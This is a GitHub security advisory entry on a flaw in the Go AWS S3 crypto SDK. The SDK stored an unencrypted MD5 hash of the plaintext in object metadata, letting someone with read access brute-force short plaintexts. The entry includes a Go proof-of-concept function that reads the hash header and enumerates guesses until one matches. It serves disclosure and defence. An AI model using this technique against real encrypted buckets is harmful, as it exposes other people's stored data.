- "details": "### Summary\n\nThe golang AWS S3 Crypto SDK was impacted by an issue that can result in loss of confidentiality. An attacker with read access to an encrypted S3 bucket was able to recover the plaintext without accessing the encryption key.\n\n### Specific Go Packages Affected\ngithub.com/aws/aws-sdk-go/service/s3/s3crypto\n\n### Risk/Severity\n\nThe vulnerability poses insider risks/privilege escalation risks, circumventing KMS controls for stored data.\n\n### Impact\n\nThe issue has been fully mitigated by AWS as of Aug. 5th by disallowing the header in question.\n\nThe S3 crypto library tries to store an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext in an offline attack, if the hash is readable to the attacker. In order to be impacted by this issue, the attacker has to be able to guess the plaintext as a whole. The attack is theoretically valid if the plaintext entropy is below the key size, i.e. if it is easier to brute force the plaintext instead of the key itself, but practically feasible only for short plaintexts or plaintexts otherwise accessible to the attacker in order to create a rainbow table.\n\nThe issue has been fixed server-side by AWS as of Aug 5th, by blocking the related metadata field. No S3 objects are affected anymore.\n\n### Mitigation\n\nThe header in question is no longer served by AWS, making this attack fully mitigated as of Aug. 5th.\n\n### Proof of concept\n\nA [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository, this particular issue can be found at [here](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/hash_exploit.go):\n\n```golang\nfunc HashExploit(bucket string, key string, input *OfflineAttackInput) (string, error) {\n\t_, header, err := input.S3Mock.GetObjectDirect(bucket, key)\n\tlength, err := strconv.Atoi(header.Get(\"X-Amz-Meta-X-Amz-Unencrypted-Content-Length\"))\n\tplaintextMd5 := header.Get(\"X-Amz-Meta-X-Amz-Unencrypted-Content-Md5\")\n\tblocks := length / 16\n\tpossiblePlaintextNum := 1\n\tsegNum := len(input.PossiblePlaintextSegments)\n\tfor i := 0; i < blocks; i++ {\n\t\tpossiblePlaintextNum *= segNum\n\t}\n\tfor i := 0; i < possiblePlaintextNum; i++ {\n\t\tw := i\n\t\tguess := \"\"\n\t\tfor j := 0; j < blocks; j++ {\n\t\t\tguess += input.PossiblePlaintextSegments[w%segNum]\n\t\t\tw /= segNum\n\t\t}\n\t\tguessMd5 := md5.Sum([]byte(guess))\n\t\tif plaintextMd5 == base64.StdEncoding.EncodeToString(guessMd5[:]) {\n\t\t\treturn guess, nil\n\t\t}\n\t}\n\treturn \"\", fmt.Errorf(\"No plaintext found!\")\n}\n```\n\nThe PoC will only work on old versions of the library, as the hash has been removed from being calculated as well.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments